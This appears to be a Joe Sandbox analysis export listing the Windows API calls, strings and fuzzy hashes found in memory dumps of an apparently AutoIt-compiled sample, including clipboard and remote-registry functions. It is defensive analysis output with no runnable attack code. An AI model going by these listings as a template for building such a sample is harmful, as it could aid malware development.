                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                    • API String ID: 1038674560-3360698832
                                                                                                                    • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                    • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                    • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                    • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                                    APIs
                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                    • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                    • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                    • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                    • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                    • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                    • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                    • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                    • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                    • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$Load
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1675784387-0
                                                                                                                    • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                    • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                    • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                    • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                    • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                    • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                    • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                    • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                    • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                    • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                    • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1582027408-0
                                                                                                                    • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                                    • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                    • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                                    • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                    APIs
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseConnectCreateRegistry
                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                    • API String ID: 3217815495-966354055
                                                                                                                    • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                                    • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                    • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                                    • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
APIs
• GetCursorPos.USER32(?), ref: 004566AE
• GetDesktopWindow.USER32 ref: 004566C3
• GetWindowRect.USER32(00000000), ref: 004566CA
• GetWindowLongW.USER32(?,000000F0), ref: 00456722
• GetWindowLongW.USER32(?,000000F0), ref: 00456735
• DestroyWindow.USER32(?), ref: 00456746
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
• SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
• SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
• SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
• SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
• IsWindowVisible.USER32(?), ref: 0045682C
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
• SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
• GetWindowRect.USER32(?,?), ref: 00456873
• MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
• GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
• CopyRect.USER32(?,?), ref: 004568BE
• SendMessageW.USER32(?,00000412,00000000), ref: 00456914
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
• String ID: ($,$tooltips_class32
• API String ID: 225202481-3320066284
• Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
• Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
• Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
• Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
• Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
• Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
• Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
• Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetWindowRect.USER32(?,?), ref: 00471CF7
• GetClientRect.USER32(?,?), ref: 00471D05
• GetSystemMetrics.USER32(00000007), ref: 00471D0D
• GetSystemMetrics.USER32(00000008), ref: 00471D20
• GetSystemMetrics.USER32(00000004), ref: 00471D42
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
• GetSystemMetrics.USER32(00000007), ref: 00471D79
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
• GetSystemMetrics.USER32(00000008), ref: 00471DAB
• GetSystemMetrics.USER32(00000004), ref: 00471DCF
• SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
• AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
• GetClientRect.USER32(?,?), ref: 00471E8A
• GetStockObject.GDI32(00000011), ref: 00471EA6
• SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
• SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
Similarity
• API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
• String ID: @$AutoIt v3 GUI
• API String ID: 867697134-3359773793
• Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
• Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
• Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
• Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1503153545-1459072770
• Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
• Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
• Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
• Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
• API String ID: 790654849-32604322
• Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
• Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
• Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
• Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
• Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
• Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
• Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2353593579-4108050209
                                                                                                                    • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                    • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                    • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                    • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                    • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                    • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                    • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                    • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                    • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1744303182-0
                                                                                                                    • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                    • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                    • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                    • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                    • __mtterm.LIBCMT ref: 00417C34
                                                                                                                      • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                      • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                    • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                    • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                    • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                    • API String ID: 4163708885-3819984048
                                                                                                                    • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                    • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                    • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                    • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                    • API String ID: 0-1896584978
                                                                                                                    • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                    • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                                    • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                    • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
